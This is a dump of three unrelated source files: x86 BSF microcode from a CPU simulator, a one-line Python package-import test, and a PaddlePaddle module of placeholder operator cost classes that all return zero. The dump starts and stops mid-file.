mov t1, t1, t3, flags=(nCEZF,)
# Bit 2
srli t3, t1, 2, dataSize=8, flags=(EZF,)
ori t4, reg, 2
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 1
srli t3, t1, 1, dataSize=8, flags=(EZF,)
ori t4, reg, 1
mov reg, reg, t4, flags=(nCEZF,)
end:
fault "NoFault"
};
def macroop BSF_R_M {
mov t1, t1, t0, dataSize=8
ld t1, seg, sib, disp
# Determine if the input was zero, and also move it to a temp reg.
and t1, t1, t1, flags=(ZF,)
br label("end"), flags=(CZF,)
# Zero out the result register
mov reg, reg, t0
subi t2, t1, 1
xor t1, t2, t1
# Bit 6
srli t3, t1, 32, dataSize=8, flags=(EZF,)
ori t4, reg, 32
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 5
srli t3, t1, 16, dataSize=8, flags=(EZF,)
ori t4, reg, 16
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 4
srli t3, t1, 8, dataSize=8, flags=(EZF,)
ori t4, reg, 8
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 3
srli t3, t1, 4, dataSize=8, flags=(EZF,)
ori t4, reg, 4
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 2
srli t3, t1, 2, dataSize=8, flags=(EZF,)
ori t4, reg, 2
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 1
srli t3, t1, 1, dataSize=8, flags=(EZF,)
ori t4, reg, 1
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
end:
fault "NoFault"
};
def macroop BSF_R_P {
rdip t7
mov t1, t1, t0, dataSize=8
ld t1, seg, riprel, disp
# Determine if the input was zero, and also move it to a temp reg.
and t1, t1, t1, flags=(ZF,)
br label("end"), flags=(CZF,)
# Zero out the result register
mov reg, reg, t0
subi t2, t1, 1
xor t1, t2, t1
# Bit 6
srli t3, t1, 32, dataSize=8, flags=(EZF,)
ori t4, reg, 32
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 5
srli t3, t1, 16, dataSize=8, flags=(EZF,)
ori t4, reg, 16
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 4
srli t3, t1, 8, dataSize=8, flags=(EZF,)
ori t4, reg, 8
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 3
srli t3, t1, 4, dataSize=8, flags=(EZF,)
ori t4, reg, 4
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 2
srli t3, t1, 2, dataSize=8, flags=(EZF,)
ori t4, reg, 2
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
# Bit 1
srli t3, t1, 1, dataSize=8, flags=(EZF,)
ori t4, reg, 1
mov reg, reg, t4, flags=(nCEZF,)
mov t1, t1, t3, flags=(nCEZF,)
end:
fault "NoFault"
};
'''
62506149ff2fdfde622b98f80a835898e6008ff5 | 155 | py | Python | python/tests/test_packages.py | kennyworkman/replicate | df9358847cdbb3d0e87018511e0a392d750d818a | ["Apache-2.0"]
import datetime
from replicate.packages import get_imported_packages
def test_get_imported_packages():
assert "replicate" in get_imported_packages()
6556a1110d222ddc03ba76ca89390587467f016e | 42,102 | py | Python | python/paddle/distributed/auto_parallel/cost/comp_op_cost.py | L-Net-1992/Paddle | 4d0ca02ba56760b456f3d4b42a538555b9b6c307 | ["Apache-2.0"]
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from .base_cost import Cost, register_op_cost, CompOpCost, _g_op_cost_factory
@register_op_cost
class AssignOpCost(CompOpCost):
OP_TYPE = "assign"
def __init__(self, op=None, op_desc=None, cluster=None):
super(AssignOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class AssignValueOpCost(CompOpCost):
OP_TYPE = "assign_value"
def __init__(self, op=None, op_desc=None, cluster=None):
super(AssignValueOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
# For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class BeamSearchOpCost(CompOpCost):
OP_TYPE = "beam_search"
def __init__(self, op=None, op_desc=None, cluster=None):
super(BeamSearchOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class BeamSearchDecodeOpCost(CompOpCost):
OP_TYPE = "beam_search_decode"
def __init__(self, op=None, op_desc=None, cluster=None):
super(BeamSearchDecodeOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class CastOpCost(CompOpCost):
OP_TYPE = "cast"
def __init__(self, op=None, op_desc=None, cluster=None):
super(CastOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ConcatOpCost(CompOpCost):
OP_TYPE = "concat"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ConcatOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ElementwiseAddOpCost(CompOpCost):
OP_TYPE = "elementwise_add"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseAddOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ElementwiseAddGradOpCost(CompOpCost):
OP_TYPE = "elementwise_add_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseAddGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ElementwiseDivOpCost(CompOpCost):
OP_TYPE = "elementwise_div"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseDivOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ElementwiseDivGradOpCost(CompOpCost):
OP_TYPE = "elementwise_div_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseDivGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ElementwiseMulOpCost(CompOpCost):
OP_TYPE = "elementwise_mul"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseMulOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ElementwiseMulGradOpCost(CompOpCost):
OP_TYPE = "elementwise_mul_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseMulGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ElementwiseSubOpCost(CompOpCost):
OP_TYPE = "elementwise_sub"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseSubOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ElementwiseSubGradOpCost(CompOpCost):
OP_TYPE = "elementwise_sub_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ElementwiseSubGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class EmbeddingOpCost(CompOpCost):
OP_TYPE = "c_embedding"
def __init__(self, op=None, op_desc=None, cluster=None):
super(EmbeddingOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class EmbeddingGradOpCost(CompOpCost):
OP_TYPE = "c_embedding_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(EmbeddingGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class FillConstantOpCost(CompOpCost):
OP_TYPE = "fill_constant"
def __init__(self, op=None, op_desc=None, cluster=None):
super(FillConstantOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class FillConstantBatchSizeLikeOpCost(CompOpCost):
OP_TYPE = "fill_constant_batch_size_like"
def __init__(self, op=None, op_desc=None, cluster=None):
super(FillConstantBatchSizeLikeOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class FillConstantBatchSizeLikeGradOpCost(CompOpCost):
OP_TYPE = "fill_constant_batch_size_like_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(FillConstantBatchSizeLikeGradOpCost,
self).__init__(op=op, op_desc=op_desc, cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class GatherOpCost(CompOpCost):
OP_TYPE = "gather"
def __init__(self, op=None, op_desc=None, cluster=None):
super(GatherOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class GeluOpCost(CompOpCost):
OP_TYPE = "gelu"
def __init__(self, op=None, op_desc=None, cluster=None):
super(GeluOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class GeluGradOpCost(CompOpCost):
OP_TYPE = "gelu_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(GeluGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class GreaterEqualOpCost(CompOpCost):
OP_TYPE = "greater_equal"
def __init__(self, op=None, op_desc=None, cluster=None):
super(GreaterEqualOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class IncrementOpCost(CompOpCost):
OP_TYPE = "increment"
def __init__(self, op=None, op_desc=None, cluster=None):
super(IncrementOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
    def calc_flops(self):
        # NOTE: The actual formula will be filled in the future
        return 0

    def calc_time(self):
        # NOTE: The actual formula will be filled in the future
        return 0
@register_op_cost
class IsEmptyOpCost(CompOpCost):
OP_TYPE = "is_empty"
def __init__(self, op=None, op_desc=None, cluster=None):
super(IsEmptyOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
    def calc_flops(self):
        # NOTE: The actual formula will be filled in the future
        return 0

    def calc_time(self):
        # NOTE: The actual formula will be filled in the future
        return 0
@register_op_cost
class LayerNormOpCost(CompOpCost):
OP_TYPE = "layer_norm"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LayerNormOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LayerNormGradOpCost(CompOpCost):
OP_TYPE = "layer_norm_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LayerNormGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LessThanOpCost(CompOpCost):
OP_TYPE = "less_than"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LessThanOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LogicalNotOpCost(CompOpCost):
OP_TYPE = "logical_not"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LogicalNotOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LogicalAndOpCost(CompOpCost):
OP_TYPE = "logical_and"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LogicalAndOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LodResetOpCost(CompOpCost):
OP_TYPE = "lod_reset"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LodResetOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LogOpCost(CompOpCost):
OP_TYPE = "log"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LogOpCost, self).__init__(op=op, op_desc=op_desc, cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LookupTableV2OpCost(CompOpCost):
OP_TYPE = "lookup_table_v2"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LookupTableV2OpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class LookupTableV2GradOpCost(CompOpCost):
OP_TYPE = "lookup_table_v2_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(LookupTableV2GradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class MatmulOpCost(CompOpCost):
OP_TYPE = "matmul"
def __init__(self, op=None, op_desc=None, cluster=None):
super(MatmulOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class MatmulGradOpCost(CompOpCost):
OP_TYPE = "matmul_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(MatmulGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class MatmulV2OpCost(CompOpCost):
OP_TYPE = "matmul_v2"
def __init__(self, op=None, op_desc=None, cluster=None):
super(MatmulV2OpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class MatmulV2GradOpCost(CompOpCost):
OP_TYPE = "matmul_v2_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(MatmulV2GradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class MemcpyOpCost(CompOpCost):
OP_TYPE = "memcpy"
def __init__(self, op=None, op_desc=None, cluster=None):
super(MemcpyOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class MulOpCost(CompOpCost):
OP_TYPE = "mul"
def __init__(self, op=None, op_desc=None, cluster=None):
super(MulOpCost, self).__init__(op=op, op_desc=op_desc, cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class MulGradOpCost(CompOpCost):
OP_TYPE = "mul_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(MulGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class OneHotOpCost(CompOpCost):
OP_TYPE = "one_hot"
def __init__(self, op=None, op_desc=None, cluster=None):
super(OneHotOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ReadFromArrayOpCost(CompOpCost):
OP_TYPE = "read_from_array"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ReadFromArrayOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ReduceSumOpCost(CompOpCost):
OP_TYPE = "reduce_sum"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ReduceSumOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ReduceSumGradOpCost(CompOpCost):
OP_TYPE = "reduce_sum_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ReduceSumGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class Reshape2OpCost(CompOpCost):
OP_TYPE = "reshape2"
def __init__(self, op=None, op_desc=None, cluster=None):
super(Reshape2OpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class Reshape2GradOpCost(CompOpCost):
OP_TYPE = "reshape2_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(Reshape2GradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ReduceMeanOpCost(CompOpCost):
OP_TYPE = "reduce_mean"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ReduceMeanOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ReduceMeanGradOpCost(CompOpCost):
OP_TYPE = "reduce_mean_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ReduceMeanGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SamplingIdOpCost(CompOpCost):
OP_TYPE = "sampling_id"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SamplingIdOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class ScaleOpCost(CompOpCost):
OP_TYPE = "scale"
def __init__(self, op=None, op_desc=None, cluster=None):
super(ScaleOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SliceOpCost(CompOpCost):
OP_TYPE = "slice"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SliceOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SoftmaxOpCost(CompOpCost):
OP_TYPE = "softmax"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SoftmaxOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SoftmaxGradOpCost(CompOpCost):
OP_TYPE = "softmax_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SoftmaxGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SoftmaxWithCrossEntropyOpCost(CompOpCost):
OP_TYPE = "softmax_with_cross_entropy"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SoftmaxWithCrossEntropyOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SoftmaxWithCrossEntropyGradOpCost(CompOpCost):
OP_TYPE = "softmax_with_cross_entropy_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SoftmaxWithCrossEntropyGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SplitOpCost(CompOpCost):
OP_TYPE = "split"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SplitOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class Squeeze2OpCost(CompOpCost):
OP_TYPE = "squeeze2"
def __init__(self, op=None, op_desc=None, cluster=None):
super(Squeeze2OpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SquareOpCost(CompOpCost):
OP_TYPE = "square"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SquareOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SquareGradOpCost(CompOpCost):
OP_TYPE = "square_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(SquareGradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class SumOpCost(CompOpCost):
OP_TYPE = "sum"
def __init__(self, op=None, op_desc=None, cluster=None):
